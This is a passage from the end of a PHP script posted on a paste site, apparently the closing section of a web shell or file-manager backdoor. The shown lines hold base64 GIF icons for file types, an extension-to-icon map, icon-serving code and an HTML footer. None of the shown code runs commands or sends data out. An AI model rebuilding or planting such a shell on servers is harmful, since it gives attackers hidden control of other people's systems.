  2585. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
  2586. "+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
  2587. "IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
  2588. "write"=>
  2589. "R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
  2590. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
  2591. "EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
  2592. "LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
  2593. "ext_asp"=>
  2594. "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
  2595. "/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
  2596. "D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
  2597. "ext_mp3"=>
  2598. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
  2599. "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
  2600. "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
  2601. "ext_avi"=>
  2602. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
  2603. "WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
  2604. "PYXCyg+V2i44XeRmSfYqsGhAAgA7",
  2605. "ext_cgi"=>
  2606. "R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
  2607. "DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
  2608. "LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
  2609. "Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
  2610. "Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2611. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2612. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2613. "AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
  2614. "BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
  2615. "AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
  2616. "RYtMAgEAOw==",
  2617. "ext_cmd"=>
  2618. "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
  2619. "eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
  2620. "dmrYAMn1onq/YKpjvEgAADs=",
  2621. "ext_cpp"=>
  2622. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
  2623. "WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
  2624. "Eq7YrLDE7a4SADs=",
  2625. "ext_ini"=>
  2626. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
  2627. "aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
  2628. "SnEjgPVarHEHgrB43JvszsQEADs=",
  2629. "ext_diz"=>
  2630. "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
  2631. "/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
  2632. "/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
  2633. "/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
  2634. "/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
  2635. "pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
  2636. "dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
  2637. "9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
  2638. "4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2639. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2640. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2641. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2642. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2643. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2644. "AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
  2645. "C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
  2646. "2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
  2647. "CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
  2648. "Ow==",
  2649. "ext_doc"=>
  2650. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
  2651. "WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
  2652. "MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
  2653. "ext_exe"=>
  2654. "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
  2655. "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
  2656. "xhIAOw==",
  2657. "ext_h"=>
  2658. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
  2659. "WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
  2660. "Wq/NknbbSgAAOw==",
  2661. "ext_hpp"=>
  2662. "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
  2663. "WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
  2664. "UqUagnbLdZa+YFcCADs=",
  2665. "ext_htaccess"=>
  2666. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
  2667. "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
  2668. "AAA7",
  2669. "ext_html"=>
  2670. "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
  2671. "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
  2672. "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
  2673. "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
  2674. "ADs=",
  2675. "ext_jpg"=>
  2676. "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
  2677. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
  2678. "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
  2679. "FxEAOw==",
  2680. "ext_js"=>
  2681. "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
  2682. "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
  2683. "a00AjYYBbc/o9HjNniUAADs=",
  2684. "ext_lnk"=>
  2685. "R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
  2686. "NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
  2687. "Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
  2688. "AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
  2689. "MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
  2690. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2691. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2692. "AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
  2693. "NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
  2694. "1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
  2695. "ADs=",
  2696. "ext_log"=>
  2697. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
  2698. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
  2699. "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
  2700. "ext_php"=>
  2701. "R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0OqpaGeyYpqJlRG/rlwAADs=",
  2702. "ext_pl"=>
  2703. "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
  2704. "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
  2705. "ext_swf"=>
  2706. "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
  2707. "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  2708. "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
  2709. "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
  2710. "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
  2711. "ext_tar"=>
  2712. "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
  2713. "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
  2714. "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
  2715. "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
  2716. "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2717. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2718. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2719. "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
  2720. "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
  2721. "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
  2722. "u4tLAgEAOw==",
  2723. "ext_txt"=>
  2724. "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
  2725. "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
  2726. "UpPWG3Ig6Hq/XmRjuZwkAAA7",
  2727. "ext_wri"=>
  2728. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  2729. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  2730. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  2731. "ext_xml"=>
  2732. "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
  2733. "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2734. "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
  2735. "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
  2736. "IQA7"
  2737. );
  2738. $imgequals = array(
  2739.   "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  2740.   "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
  2741.   "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
  2742.   "ext_html"=>array("ext_html","ext_htm"),
  2743.   "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
  2744.   "ext_lnk"=>array("ext_lnk","ext_url"),
  2745.   "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
  2746.   "ext_doc"=>array("ext_doc","ext_dot"),
  2747.   "ext_js"=>array("ext_js","ext_vbs"),
  2748.   "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
  2749.   "ext_wri"=>array("ext_wri","ext_rtf"),
  2750.   "ext_swf"=>array("ext_swf","ext_fla"),
  2751.   "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
  2752.   "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
  2753. );
  2754. if (!$getall) {
  2755.   header("Content-type: image/gif");
  2756.   header("Cache-control: public");
  2757.   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  2758.   header("Cache-control: max-age=".(60*60*24*7));
  2759.   header("Last-Modified: ".date("r",filemtime(__FILE__)));
  2760.   foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
  2761.   if (empty($images[$img])) {$img = "small_unk";}
  2762.   if (in_array($img,$ext_tar)) {$img = "ext_tar";}
  2763.   echo base64_decode($images[$img]);
  2764. }
  2765. else {
  2766.   foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
  2767.   natsort($images);
  2768.   $k = array_keys($images);
  2769.   echo  "<center>";
  2770.   foreach ($k as $u) {echo $u.":<img src=\"".$surl."x=img&img=".$u."\" border=\"1\"><br>";}
  2771.   echo "</center>";
  2772. }
  2773. exit;
  2774. }
  2775. echo "</td></tr></table>
  2776. <table><tr><td>
  2777. <div class=barheader2 colspan=2><font color='#4C83AF'>copyright by <a href='$sh_mainurl' target='_blank'><font color='#ffffff'>$b_name</font></a> | <font color='#ffffff'> $b_version</font> </div>
  2778. </td></tr></table></body></html>";
  2779. ?>
Add Comment
Please, Sign In to add comment